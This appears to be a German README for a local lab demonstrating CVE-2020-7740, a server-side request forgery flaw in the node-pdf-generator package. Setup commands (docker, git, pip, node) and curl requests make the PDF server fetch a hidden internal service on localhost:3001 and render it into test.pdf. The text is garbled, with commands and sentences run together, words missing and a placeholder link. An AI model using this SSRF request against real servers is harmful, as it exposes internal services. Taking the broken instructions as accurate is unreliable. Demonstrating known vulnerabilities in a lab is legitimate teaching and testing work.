
Ein Beispiel von CVE-2020-7740
Dies betrifft alle Versionen des Pakets node-pdf-generator. Aufgrund fehlender Eingabevalidierung und -bereinigung des Inhalts, der an node-pdf-generator übergeben wird, ist es einem Angreifer möglich, eine URL zu erstellen, die an einen externen Server weitergeleitet wird, was einen SSRF-Angriff ermöglicht.
docker run -p 3000:3000 cve-2020-7740localhost:3001 nicht direkt aufrufen können.curl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdftest.pdf, um die lokale Website anzuzeigen, die versteckt sein sollte.git clone {link to be inserted}https://wkhtmltopdf.org/node .\NodePdfGeneratorServer – der Server läuft dann unter localhost:3000python3 -m pip install -r requirements.txtpython3 HiddenService – der Server läuft dann unter 'localhost:3001`curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdf gesendet werden.http://www.google.com in der Datei test.pdf gespeichert.